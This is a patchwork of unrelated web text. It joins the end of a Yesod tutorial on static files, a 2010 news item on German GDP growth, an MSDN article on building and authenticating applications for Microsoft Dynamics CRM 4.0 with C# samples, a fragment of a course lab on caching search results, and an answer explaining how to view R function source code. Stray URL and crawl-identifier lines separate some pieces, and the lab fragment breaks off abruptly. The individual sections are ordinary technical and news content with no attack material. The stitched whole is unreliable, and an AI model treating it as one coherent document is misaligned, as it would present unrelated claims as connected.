expiration headers far in the future, and incldues an etag based on a hash of your content. - Whenever you embed a link to mylogo_png, the rendering includes the query-string parameter. If you change the logo, recompile, and launch your new app, the query string will have changed, causing users to ignore the cached copy and download a new version. Additionally, you can set a specific static root in your Settings.hs file to serve from a different domain name. This has the advantage of not requiring transmission of cookies for static file requests, and also lets you offload static file hosting to a CDN or a service like Amazon S3. See the comments in the file for more details. Another optimization is that CSS and Javascript included in your widgets will not be included inside your HTML. Instead, their contents will be written to an external file, and a link given. This file will be named based on a hash of the contents as well, meaning: - Caching works properly. - Yesod can avoid an expensive disk write of the CSS/Javascript file contents if a file with the same hash already exists. Finally, all of your Javascript is automatically minified via hjsmin. Conclusion The purpose of this chapter was not to explain every line that exists in the scaffolded site, but instead to give a general overview to how it works. The best way to become more familiar with it is to jump right in and start writing a Yesod site with it.
http://www.yesodweb.com/blog/2011/12/yesod-scaffolded-site
CC-MAIN-2014-35
refinedweb
2,045
64
13 August 2010 10:08 [Source: ICIS news] LONDON (ICIS)--The German economy grew at a record level in the second quarter of this year, bringing the recovery of ?xml:namespace> Germany’s GDP rose by 2.2% in the second quarter of 2010 from the previous quarter, based on price, seasonal and calendar adjustment, said Destatis. “Both domestic and foreign demand made a positive contribution to growth. The dynamic trends observed in capital formation and foreign trade contributed most strongly to the positive development,” Destatis said. Household and government final consumption expenditure also contributed to Germany's second-quarter GDP growth, the office added. Compared with the second quarter of last year, the office said Germany's GDP increased by a considerable 4.1%. The economic performance in the second quarter of 2010 was achieved by 40.3m people in employment. That was an increase of 72,000 people, or 0.2%, from a year earlier, Destatis.
http://www.icis.com/Articles/2010/08/13/9384789/germany-second-quarter-gdp-rises-by-a-record-2.2-destatis.html
CC-MAIN-2013-20
refinedweb
158
57.98
A skeleton version of the programs will appear in your cs35/labs/08 directory when you run update35. The program handin35 will only submit files in this directory. I encourage you to work with a partner on this lab and the entire project. This lab is the third part of a larger project to build a web browser with a search engine for a limited portion of the web. In the first part you summarized the content of a web page by creating a binary search tree that contained the word frequencies of all words that appeared in the page that were not in a given file of words to ignore. In the second part you read in a list of URLs and constructed word frequency trees to summarize their content. Next you prompted the user for a query, searched for each query word in the saved word frequency trees, and then used a priority queue to report the most relevant pages for the query. In the third part of this project, you will make the search for relevant pages more efficient by caching search results in a dictionary. Each time a query is entered, you will first check a dictionary to see if this query has been answered before. If so, you can get the results directly from the dictionary without any further processing. If not, you will create the results as you did in part 2 and add them to the dictionary. We'd like to be able to use the cache as much as possible to make our web browser fast. To this end we will remove all ignore words from the query, sort the remaining words, and concatenate them together to make a string key for our dictionary. In this way the queries "computer science department" and "department of computer science" will both end up with the same key "computer department science", assuming "of" is one of the ignore words. Using this approach will allow us to find saved results more frequently, and take the most advantage of the cache. As before, your program will take two command-line arguments: the filename of a list of URLs stored in the Computer Science domain and the filename of a list of words to ignore during the analysis. For example: % ./part3 urls.txt ignore.txt This will output: Scanning the ignore file...done. Summarized 13 urls Enter a query or type 'quit' to end Search for: analysis of algorithms ignoring of query key: algorithms analysis Relevant pages: : 7 : 6 : 4 : 4 : 4 : 2 : 1 : 1 Added to cache Search for: algorithms analysis query key: algorithms analysis Found in cache! Relevant pages: : 7 : 6 : 4 : 4 : 4 : 2 : 1 : 1 Search for: computer science department query key: computer department science Relevant pages: : 35 : 24 : 20 : 17 : 16 : 5 : 1 Added to cache Search for: department of computer science ignoring of query key: computer department science Found in cache! Relevant pages: : 35 : 24 : 20 : 17 : 16 : 5 : 1 Search for: quit Goodbye A number of classes are provided for you. Classes, programs or files from the previous lab that you need to copy into the current lab directory are underlined below. Classes, programs or files that you have to complete for this lab appear in bold below. char line[80]; string answer; answer = "Relevant pages:\n"; loop until PQ is empty removeMin from the PQ of urls sprintf(line, "%60s : %d\n", url.c_str(), frequency); answer += line;It uses sprintf, which does formatted printing into a string, to construct the result in the variable answer. If this idea of saving the hit count and url of all matching webpages as string seems a bit artificial, look at the optional extensions below for a better alternative. char query[100]; cout << "Search for: "; cin.getline(query, 100); string q = query; //convert char* buffer to stringUsing SavedResult objects as a dictionary value may cause some unexpected errors. Here are some common errors and their solution. This error appears in the keyValuePair constructor when the VALUE type (in this case a SavedResult object) does not have a default constructor. The quick fix is to just a add a dummy default constructor in the SavedResult class. Add SavedResult(); as public method in SavedResult.h and add the following implementation in SavedResult.cpp. SavedResult::SavedResult() { string answer = ""; string bestURL = ""; }A better fix is to use Initialization lists in keyValuePair.inl and change the constructor to template <typename KEY, typename VALUE> KVPair<KEY, VALUE>::KVPair(KEY k, VALUE v): key(k), value(v) { }but initializations lists are a bit beyond the scope of cs35 and default constructors may come in handy at other times. This problem results because C++ does not know how to compare two SavedResult objects for equality. This can be fixed using operator overloading and defining == for the SavedResult class. Add bool operator==(SavedResult& other); to SavedResult.h and implement as follows in SavedResult.cpp bool SavedResult::operator==(SavedResult& other){ return (other.getBestURL()==bestURL && other.getAnswer()==answer); } These additional exercises are not required. Only attempt them once you have successfully completed the requirements described above.
https://web.cs.swarthmore.edu/~adanner/cs35/f10/lab8.php
CC-MAIN-2022-33
refinedweb
851
59.74
Wiki ntobjx / Home NT Objects This utility, named NT Objects or short: ntobjx, can be used to explore the Windows object manager namespace. The GUI should be self-explanatory for the most part, especially if you have ever used Windows Explorer. If you have already used WinObj by Microsoft, you will even recognize many of the names. You can find the latest information about the tool on the overview page and can download the respective latest version from the download page. How to build Help/documentation Similar software - WinObj the original program from SysInternals (meanwhile a division of Microsoft). - Object Manager Namespace Viewer a tool I cowrote with Marcel van Brakel in Delphi some years back in order to showcase the JEDI API header translations for the NT native API. - ObjectManagerBrowser only found out about this by accident in June 2017. Referenced here so evidently around since at least 2014. - WinObjEx64 If you are aware of any other similar software, please open a ticket or drop me an email. Updated
https://bitbucket.org/assarbad/ntobjx/wiki/Home
CC-MAIN-2019-09
refinedweb
170
52.49
Application Development in Microsoft Dynamics CRM 4.0 Philip Richardson Microsoft Corporation August 2008 Summary The following topics are covered in this article: - ASP.NET applications on the Microsoft Dynamics CRM 4.0 server - ASP.NET applications for Microsoft Dynamics CRM 4.0 for Microsoft Office Outlook with Offline Access - Plug-ins - Custom workflow activities - Scripting - Setup and deployment - Application configuration Applies To Microsoft Dynamics CRM 4.0 Microsoft Visual Studio 2005 Introduction 'inside'. - Setup: You may want to create a setup project to deploy your projects to the Microsoft Dynamics CRM server and client computers. Creating your Development Environment When you set up your Microsoft Dynamics CRM development environment you have two choices to make: networked or stand-alone. If you use the networked approach you can set up a Microsoft Dynamics CRM server on your actual network by using physical or virtual computers. The stand-alone option is typically vertical using a "one-box" deployment. For the networked approach you should follow the steps in the Microsoft Dynamics CRM 4.0 Implementation Guide. It's highly suggested that you configure the box for both regular Windows and Internet-facing deployment (IFD) authentication modes. Creating your own virtual one-box deployment might seem a bit difficult at first, but I assure you it is easy and doesn't take very long. This checklist will help you get started. Note that the order of doing this is important. You should read the Implementation Guide before you begin this process. Creating a one-box deployment - Hardware. At the moment, I use a Windows Vista Enterprise 64-bit on a Lenovo T60P with 4 GB of RAM. Some of my colleagues have also had success using USB sticks for ReadyBoost to increase the RAM. I put the VHD on the laptop's SATA drive. If you do use external drives, make sure that they are faster than the internal drive. - I use Virtual PC for virtualization. Virtual Server is also a good option. - The next step is to build out Windows Server Virtual Machine. Try to avoid pre-built VPCs as they tend to be loaded up with extraneous components. - Do not join this computer to your domain. For now, keep it connected to a Workgroup. - Hook your computer up to the Internet and run Windows Update. - Now configure the VPC to use the Loopback Adapter. You might first have to install the Loopback Adapter on the host operating system (for example, Vista). Here is a screencast on how to do this: Configuring the Loopback Adapter. - Change the IP address of the server to 192.168.1.1. - Change the IP address of the host operating system to 192.168.1.2. Use 192.168.1.1 as the DNS Server. - Next, make sure that the server is connected to this private loopback network. Now nothing from the outside except the host operating system can reach the server. This is a safety precaution - Install Active Directory® on the server. For those who haven't done this in a while: type dcpromo at the command prompt. Make sure to remember the restore password. - Now install Internet Information Services (IIS). - Microsoft SQL Server® is next. Use Remote Desktop to connect to the server (at 192.168.1.1). You might want to use the IP instead of the server name because you may get netbios conflicts if your host server is also connected to another network. Install SQL Server and make sure that you install SQL Server Reporting Services. For your development computer, I also suggest you use mixed-mode SQL authentication. However, you should always avoid this in a production environment (for the usual reasons). - Now install Visual Studio on the server. You may want it later for debugging. - You may want to create a config file to make your server run in IFD mode. For more information, see the Microsoft Dynamics CRM 4.0 Implementation Guide. <CRMSetup> <Server> <ifdsettings enabled="true"> <internalnetworkaddress>192.168.1.1-255.255.255.255</internalnetworkaddress> <rootdomainscheme>http</rootdomainscheme> <sdkrootdomain>crm.philiprichardson.org</sdkrootdomain> <webapplicationrootdomain>crm.philiprichardson.org</webapplicationrootdomain> </ifdsettings> </Server> </CRMSetup> - Copy all the Microsoft Dynamics CRM files to the server. The DVD is a good option here as it contains all the prerequisites (such as Microsoft Visual C++®). - To start the installer, open the command prompt and navigate to the server folder. Assuming that your config file is called ifd.xml, you can type the following: - Here is a screencast showing the installation experience: Installing CRM. - Now Microsoft Dynamics CRM is ready to use. Restart the computer and make sure everything is working. - Create some user accounts in the Active Directory of the server. - Shut down the VPC and make the VHD file read-only. This is now your "base image." - Now create a new Virtual Hard Drive with the type set to "Differencing". Parent this to the base image. This might sound a bit confusing at first. Try it out and read the VPC help files if you are unsure. - Note that to access Microsoft Dynamics CRM by using IFD from the host operating system, you also have to add the IFD URL to your hosts file (C:\windows\system32\drivers\…). Map 192.168.1.1 to orgname.crm.philiprichardson.org, substituting the name of your deployment. Also note that you need the orgname in this mapping. Each time you create a new organization you need to add this to the host operating system's hosts file. - Undo disks are also a good option on the Differencing VPC. Then, you can revert changes without creating a new VHD. - Back up everything. Now you have your environment ready to go and you can easily rebuild it if necessary. Switching Between IFD and Windows If you configured your development environment as described previously, you will notice that if you log on to the server using the IP address (192.168.1.1) or the Host file configured URL (such as), you will be prompted for Windows Credentials. I use a registry key on the Microsoft Dynamics CRM Server to change the internal subnet of the IFD setting. Microsoft Dynamics CRM looks at the IP address of the incoming request and, if this is in the internal range of the registry key, it gives you a "Windows experience." If the IP address is external, it gives you an "IFD experience." For example, if the client is configured with an IP address of 192.168.1.2 (Subnet: 255.255.255.0): - When the internal range is 192.168.1.1-255.255.255.0 you will get a Windows experience. This is the value that you provided in the config.xml file when you installed Microsoft Dynamics CRM. - When the internal range is 192.168.1.1-255.255.255.255 you will get an IFD experience. This is because the client on the host operating system has an IP of 192.168.1.2 (Subnet: 255.255.255.0), which is outside the internal range. Here are the two registry key modifications. Note that this is supported. For more information, see the Implementation Guide. IFD Experience: Windows Experience: If you have your own network configuration, you will have to determine the network addresses and subnet masks on your own. I strongly suggest you read the Implementation Guide and the IFD Setup documentation. If your environment is located on your network, you may want to contact your network administrator to figure out the correct IP ranges. Applications that Connect to Microsoft Dynamics CRM Connecting to Microsoft Dynamics CRM 4.0 uses one of two methods: SQL and Web services. Both are valid techniques but they do not provide the same functionality. SQL This approach involves making a regular SQL connection (with a technology like ADO.NET, for example) and executing SQL statements. Microsoft Dynamics CRM 4.0 has a set of special SQL views that we call the Filtered Views. Each entity in Microsoft Dynamics CRM has a corresponding filtered view. For example, the Contact entity has a view called FilteredContact. These views join together all the information for this entity and they also link to the security tables that contain the row level security information. This means that if a user has access to, for example, only 15432 contacts out of 3 million in the database, when that user does a SELECT * FROM dbo.FilteredContact they will only see 15432 rows. The filtered views can only be used for retrieving data. You should never change the database data or schema by using SQL with Microsoft Dynamics CRM. The Microsoft Dynamics CRM middle tier must handle all data and schema transactions. Never make changes directly to the database. Reporting is the main scenario for using filtered views. You can use these views to generate most of your analysis and reporting for Microsoft Dynamics CRM 4.0. You might also use them with ADO.NET (or similar technologies) when you write applications. Please be aware that the views can be locked down by system administrators. My advice: only use the filtered views for analytical applications. Web Services Using Web services is the standard way to connect to Microsoft Dynamics CRM and manipulate the data and schema of the system. Many assumptions you might have made with Microsoft Dynamics CRM 3.0, which is single tenant, must be reconsidered. Our Web service is a SOAP service, which we feel is a great fit for a complex business system such as Microsoft Dynamics CRM. There are three Web services that you should consider in your application architecture: CrmDiscoveryService: You can use this service to "discover" information about tenants (organizations) on a server (deployment). In some modes it will also issue security tickets. CrmService: This is the "main" Web service. It handles the manipulation of an organization's transactional data. MetadataService: This service handles the manipulation of an organization's metadata (schema). Authentication Understanding authentication plays a role in how you connect to Microsoft Dynamics CRM. There are four ways to perform authentication and not all are available to every deployment. Integrated Authentication Use integrated authentication within your firewall, where Integrated Windows Authentication works best. Connect to the Discovery Service and get the organization details by using System.Net.CredentialCache.DefaultCredentials. Create a CrmService by using the information from the organization details. Conduct transactions through the CrmService using System.Net.CredentialCache.DefaultCredentials. Internet-Facing Deployment Internet-facing deployment (IFD) uses Active Directory at the back end but the credentials are collected using a Forms Authentication approach. Microsoft Dynamics CRM 4.0 (the on-premise version) uses Active Directory as the Identity store. Microsoft Dynamics CRM Online uses Windows Live ID. Make an anonymous request to the Discovery Service to obtain the Microsoft Dynamics CRM Online Windows Live ID Policy. Connect to Windows Live ID and supply the Policy, Windows Live ID UserName/Password. It will give you back a Windows Live ID Ticket. Connect to the Discovery Service and get the organization details by using the Windows Live ID Ticket. Create a CRM Ticket by using the Discovery Service and the Windows Live ID Ticket. A CRM Ticket is organization-specific. Create a CrmService by using the CRM Ticket and organization details. Conduct transactions by using the CrmService. The CRM Ticket will be passed in the SOAP header. It will authenticate you for a period of time (tickets do time out) against a specific organization. The Microsoft Dynamics CRM SDK contains samples for each authentication pattern. To create applications that connect to Microsoft Dynamics CRM you need to understand the following concepts: Where do I find the deployment? This really means: What is the URL for the Discovery service? There is only one Discovery service URL for Microsoft Dynamics CRM Online. What organization do I want to connect to? Some applications always know this. Other applications may want to query the Discovery service for a list of all organizations that a user has access to, and then have the user select which organization to connect to. You have to create the UI for this. What type of Authentication is being used? Integrated, Windows, IFD, or Windows Live ID. Maybe your applications will support some of these authentication types. If so, remember that you are responsible for the UI, so help out your users when connecting. Our Microsoft Dynamics CRM for Microsoft Office Outlook application is a good example of one these kinds of applications. It's worth looking at how we solved these UI problems and see what works or doesn't work in your application. You have a choice of using our compiled type proxy or the Web Services Description Language (WSDL) when connecting to Microsoft Dynamics CRM. Note that there is not a type proxy for the Discovery service. However, the WSDL is the same for Windows, IFD, and Windows Live ID. ASP.NET Applications on the Microsoft Dynamics CRM Server In Microsoft Dynamics CRM 3.0, if you wanted to run an ASP.NET application on the same server as Microsoft Dynamics CRM you needed to use your own application pool. This application would then connect to Microsoft Dynamics CRM like an external application if it needed to read and write data in Microsoft Dynamics CRM. For credentials, these applications would simply use Integrated Windows Authentication because a majority of customers used this configuration. With the introduction of Internet-facing deployment (IFD), which uses Forms Authentication for Active Directory credentials, you cannot rely on Integrated Windows Authentication for your application. It's important to recognize that all partner-hosted customers will use IFD and most on-premise customers will configure their systems to use IFD plus Windows Authentication. Developers should always consider IFD as a primary usage pattern for their applications. Because IFD uses a Forms Authentication technology to collect Active Directory credentials, your own applications are faced with a problem. You can't use Integrated Windows Authentication because your application might be running outside the firewall where this authentication type becomes very "fragile," and you don't want to have to prompt the user for credentials. For this situation we have provided a special class in the Microsoft.Crm.Sdk.dll called CrmImpersonator. This class enables an application, which runs inside our context, to use the credentials of the logged on user. The following ASP.NET code example shows how to create a new lead and display the GUID of the record it created. The aspx and aspx.cs files should be placed on the Microsoft Dynamics CRM server in a folder that is named ISV. The Microsoft.Crm.Sdk and Microsoft.Crm.SdkTypeProxy namespaces derive from two DLLs of the same name. These DLLs are always present with Microsoft Dynamics CRM so that you don't have to package them with your solution. However, you may want to reference them in your project. You can find the DLLs in the \Server\GAC folder of your installation files or in the SDK download. using System; using System.Configuration; using System.Data; using System.Web; using System.Web.Security; using System.Web.UI; using System.Web.UI.HtmlControls; using System.Web.UI.WebControls; using System.Web.UI.WebControls.WebParts; using System.Net; using Microsoft.Crm.Sdk; using Microsoft.Crm.SdkTypeProxy; public partial class _Default : System.Web.UI.Page { protected void Page_Load(object sender, EventArgs e) { //Retrieve the organization name from the query string. string orgname = Request.QueryString["orgname"].ToString(); //Wrap the CRM Web Service Code in a using block. using (new CrmImpersonator()) { //Create a token with the static method. ExtractCrmAuthenticationToken //The 'Context' used here is the Page.Context. CrmAuthenticationToken token = CrmAuthenticationToken.ExtractCrmAuthenticationToken(Context, orgname); CrmService service = new CrmService(); service.CrmAuthenticationTokenValue = token; service.Credentials = CredentialCache.DefaultCredentials; //Create the lead object as usual. lead lead = new lead(); lead.subject = "Lorem"; lead.firstname = "John"; lead.lastname = "Smith"; lead.companyname = "Ipsum"; //Assign the owner as the caller ID from the token. //If you don't do this, the owner will be SYSTEM. lead.ownerid = new Owner(); lead.ownerid.type = EntityName.systemuser; lead.ownerid.Value = token.CallerId; //Create the lead on Skype. Guid leadid = service.Create(lead); } //Display the GUID. Response.Write(leadid.ToString()); } } Let's examine the anatomy of this code pattern: - You need to possess some prerequisites such as Page.Context, organization name, and if you are using the Metadata Service, the MetadataService URL. - The CrmAuthenticationToken was created using the static ExtractCrmAuthenticationToken method of the CrmAuthenticationToken class. - You do not have to use the Discovery Service. This code can only access the Microsoft Dynamics CRM Server that the code is running on. - You must manually set the owner of new records using the CallerId property of CrmAuthenticationToken. (See the previous code sample.) ASP.NET Applications on the Microsoft Dynamics CRM Offline Client Microsoft Dynamics CRM 4.0 enables you to write an ASP.NET application and put it on the offline client's Web server. This application can call the offline Web service platform to perform operations against Microsoft Dynamics CRM. These files are deployed in the [Program Files]\Microsoft Dynamics CRM\Client\res\Web\ISV\[Company Name]\[Application Name]. Typically you can use Windows Installer to distribute these files to clients. When you execute your code offline there are several things that you need to know: The organization name. You get this from the Registry. The port number used by the local Web server. Typically, this is 2525.However, you should always check the registry in case there is an abnormal installation. The service URLs. You can construct these by concatenating + Port Number + the service path. You always use Integrated Windows Authentication to access the offline Web services, regardless of the authentication type on the server (including Microsoft Dynamics CRM Online). You also don't have to wrap your code with a CrmImpersonator block. However if you do so, there is no harm. If you write symmetrical code for online/offline, make sure that you don't create the token using the ExtractCrmAuthenticationToken method because this is not available offline. You may want to check to see if the code is executing offline. One way to do this is to see if the Request.Url.Host is 127.0.0.1. The following sample shows how this can easily be achieved. Microsoft.Crm.Sdk; using Microsoft.Crm.SdkTypeProxy; using Microsoft.Win32; using System.Text; using System.Net; public partial class Hello : System.Web.UI.Page { protected void Page_Load(object sender, EventArgs e) { //Retrieve the port and orgname from the Registry. RegistryKey regkey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\MSCRMClient"); string orgname = regkey.GetValue("ClientAuthOrganizationName").ToString(); string portnumber = regkey.GetValue("CassiniPort").ToString(); //Construct the URLs. StringBuilder urlbuilder = new StringBuilder(); urlbuilder.Append(":"); urlbuilder.Append(portnumber); urlbuilder.Append("/mscrmservices/2007/"); string crmserviceurl = urlbuilder.ToString() + "crmservice.asmx"; //Create your token as usual. //Offline always uses Integrated Windows Authentication regardless of the Authentication on the server. CrmAuthenticationToken token = new CrmAuthenticationToken(); token.OrganizationName = orgname; token.AuthenticationType = 0; CrmService service = new CrmService(); service.CrmAuthenticationTokenValue = token; service.Credentials = CredentialCache.DefaultCredentials; service.Url = crmserviceurl; WhoAmIRequest request = new WhoAmIRequest(); WhoAmIResponse response = (WhoAmIResponse)service.Execute(request); Response.Write(response.UserId.ToString()); } } Additional Information Download the Microsoft Dynamics CRM 4.0 Software Development Kit (SDK) from the MSDN Developer Center. Send Us Your Feedback about this Article We appreciate hearing from you. To send your feedback, click the following link and type your comments in the message body.
http://msdn.microsoft.com/en-us/library/dd393301.aspx
CC-MAIN-2014-41
refinedweb
3,225
51.95
std::basic_streambuf::sputbackc Puts back a character back to the get area. If a putback position is available in the get area (gptr() > eback()), and the character c is equal to the character one position to the left of gptr() (as determined by Traits::eq(c, gptr()[-1]), then simply decrements the next pointer (gptr()). Otherwise, calls pbackfail(Traits::to_int_type(c)) to either back up the get area or to modify both the get area and possibly the associated character sequence. The I/O stream function basic_istream::putback is implemented in terms of this function. [edit] Parameters [edit] pbackfail() returns, which is Traits::eof() on failure. [edit] Example #include <iostream> #include <sstream> int main() { std::stringstream s("abcdef"); // gptr() points to 'a' in "abcdef" std::cout << "Before putback, string holds " << s.str() << '\n'; char c1 = s.get(); // c1 = 'a', gptr() now points to 'b' in "abcdef" char c2 = s.rdbuf()->sputbackc('z'); // same as s.putback('z') // gptr() now points to 'z' in "zbcdef" std::cout << "After putback, string holds " << s.str() << '\n'; char c3 = s.get(); // c3 = 'z', gptr() now points to 'b' in "zbcdef" char c4 = s.get(); // c4 = 'b', gptr() now points to 'c' in "zbcdef" std::cout << c1 << c2 << c3 << c4 << '\n'; s.rdbuf()->sputbackc('b'); // gptr() now points to 'b' in "zbcdef" s.rdbuf()->sputbackc('z'); // gptr() now points to 'z' in "zbcdef"b No room to putback after 'z'
https://en.cppreference.com/w/cpp/io/basic_streambuf/sputbackc
CC-MAIN-2018-34
refinedweb
235
66.23
I want to look at the source code for a function to see how it works. I know I can print a function by typing its name at the prompt: > t function (x) UseMethod("t") <bytecode: 0x2332948> <environment: namespace:base> UseMethod("t") t(1:10) > ts.union function (..., dframe = FALSE) .cbind.ts(list(...), .makeNamesTs(...), dframe = dframe, union = TRUE) <bytecode: 0x36fbf88> <environment: namespace:stats> > .cbindts Error: object '.cbindts' not found > .makeNamesTs Error: object '.makeNamesTs' not found .cbindts .makeNamesTs > matrix function (data = NA, nrow = 1, ncol = 1, byrow = FALSE, dimnames = NULL) { if (is.object(data) || !is.atomic(data)) data <- as.vector(data) .Internal(matrix(data, nrow, ncol, byrow, dimnames, missing(nrow), missing(ncol))) } <bytecode: 0x134bd10> <environment: namespace:base> > .Internal function (call) .Primitive(".Internal") > .Primitive function (name) .Primitive(".Primitive") .Primitive .C .Call .Fortran .External .Internal UseMethod("t") is telling you that t() is a (S3) generic function that has methods for different object classes. For S3 classes, you can use the methods function to list the methods for a particular generic function or class. > methods(t) [1] t.data.frame t.default t.ts* Non-visible functions are asterisked > methods(class="ts") [1] aggregate.ts as.data.frame.ts cbind.ts* cycle.ts* [5] diffinv.ts* diff.ts kernapply.ts* lines.ts [9] monthplot.ts* na.omit.ts* Ops.ts* plot.ts [13] print.ts time.ts* [<-.ts* [.ts* [17] t.ts* window<-.ts* window.ts* Non-visible functions are asterisked "Non-visible functions are asterisked" means the function is not exported from its package's namespace. You can still view its source code via the ::: function (i.e. stats:::t.ts), or by using getAnywhere(). getAnywhere() is useful because you don't have to know which package the function came from. > getAnywhere(t.ts) A single object matching ‘t.ts’ was found It was found in the following places registered S3 method for t from namespace stats namespace:stats with value function (x) { cl <- oldClass(x) other <- !(cl %in% c("ts", "mts")) class(x) <- if (any(other)) cl[other] attr(x, "tsp") <- NULL t(x) } <bytecode: 0x294e410> <environment: namespace:stats> The S4 system is a newer method dispatch system and is an alternative to the S3 system. Here is an example of an S4 function: > library(Matrix) Loading required package: lattice > chol2inv standardGeneric for "chol2inv" defined from package "base" function (x, ...) standardGeneric("chol2inv") <bytecode: 0x000000000eafd790> <environment: 0x000000000eb06f10> Methods may be defined for arguments: x Use showMethods("chol2inv") for currently available ones. The output already offers a lot of information. standardGeneric is an indicator of an S4 function. The method to see defined S4 methods is offered helpfully: > showMethods(chol2inv) Function: chol2inv (package base) x="ANY" x="CHMfactor" x="denseMatrix" x="diagonalMatrix" x="dtrMatrix" x="sparseMatrix" getMethod can be used to see the source code of one of the methods: > getMethod("chol2inv", "diagonalMatrix") Method Definition: function (x, ...) { chk.s(...) tcrossprod(solve(x)) } <bytecode: 0x000000000ea2cc70> <environment: namespace:Matrix> Signatures: x target "diagonalMatrix" defined "diagonalMatrix" There are also methods with more complex signatures for each method, for example require(raster) showMethods(extract) Function: extract (package raster) x="Raster", y="data.frame" x="Raster", y="Extent" x="Raster", y="matrix" x="Raster", y="SpatialLines" x="Raster", y="SpatialPoints" x="Raster", y="SpatialPolygons" x="Raster", y="vector" To see the source code for one of these methods the entire signature must be supplied, e.g. getMethod("extract" , signature = c( x = "Raster" , y = "SpatialPolygons") ) It will not suffice to supply the partial signature getMethod("extract",signature="SpatialPolygons") #Error in getMethod("extract", signature = "SpatialPolygons") : # No method found for function "extract" and signature SpatialPolygons In the case of ts.union, .cbindts and .makeNamesTs are unexported functions from the stats namespace. You can view the source code of unexported functions by using the ::: operator or getAnywhere. > stats:::.makeNamesTs function (...) { l <- as.list(substitute(list(...)))[-1L] nm <- names(l) fixup <- if (is.null(nm)) seq_along(l) else nm == "" dep <- sapply(l[fixup], function(x) deparse(x)[1L]) if (is.null(nm)) return(dep) if (any(fixup)) nm[fixup] <- dep nm } <bytecode: 0x38140d0> <environment: namespace:stats> Note that "compiled" does not refer to byte-compiled R code as created by the compiler package. The <bytecode: 0x294e410> line in the above output indicates that the function is byte-compiled, and you can still view the source from the R command line. Functions that call .C, .Call, .Fortran, .External, .Internal, or .Primitive are calling entry points in compiled code, so you will have to look at sources of the compiled code if you want to fully understand the function. This GitHub mirror of the R source code is a decent place to start. The function pryr::show_c_source can be a useful tool as it will take you directly to a GitHub page for .Internal and .Primitive calls. Packages may use .C, .Call, .Fortran, and .External; but not .Internal or .Primitive, because these are used to call functions built into the R interpreter. Calls to some of the above functions may use an object instead of a character string to reference the compiled function. In those cases, the object is of class "NativeSymbolInfo", "RegisteredNativeSymbol", or "NativeSymbol"; and printing the object yields useful information. For example, optim calls .External2(C_optimhess, res$par, fn1, gr1, con) (note that's C_optimhess, not "C_optimhess"). optim is in the stats package, so you can type stats:::C_optimhess to see information about the compiled function being called. If you want to view compiled code in a package, you will need to download/unpack the package source. The installed binaries are not sufficient. A package's source code is available from the same CRAN (or CRAN compatible) repository that the package was originally installed from. The download.packages() function can get the package source for you. download.packages(pkgs = "Matrix", destdir = ".", type = "source") This will download the source version of the Matrix package and save the corresponding .tar.gz file in the current directory. Source code for compiled functions can be found in the src directory of the uncompressed and untared file. The uncompressing and untaring step can be done outside of R, or from within R using the untar() function. It is possible to combine the download and expansion step into a single call (note that only one package at a time can be downloaded and unpacked in this way): untar(download.packages(pkgs = "Matrix", destdir = ".", type = "source")[,2]) Alternatively, if the package development is hosted publicly (e.g. via GitHub, R-Forge, or RForge.net), you can probably browse the source code tree in individual package directories under /src/library/. How to access the R source is described in the next section. If you want to view the code built-in to the R interpreter, you will need to download/unpack the R sources; or you can view the sources online via the R Subversion repository or Winston Chang's github mirror. Uwe Ligges's R news article (PDF) (p. 43) is a good general reference of how to view the source code for .Internal and .Primitive functions. The basic steps are to first look for the function name in src/main/names.c and then search for the "C-entry" name in the files in src/main/*.
https://codedump.io/share/pMonTo1sgvL5/1/how-can-i-view-the-source-code-for-a-function
CC-MAIN-2018-17
refinedweb
1,197
57.06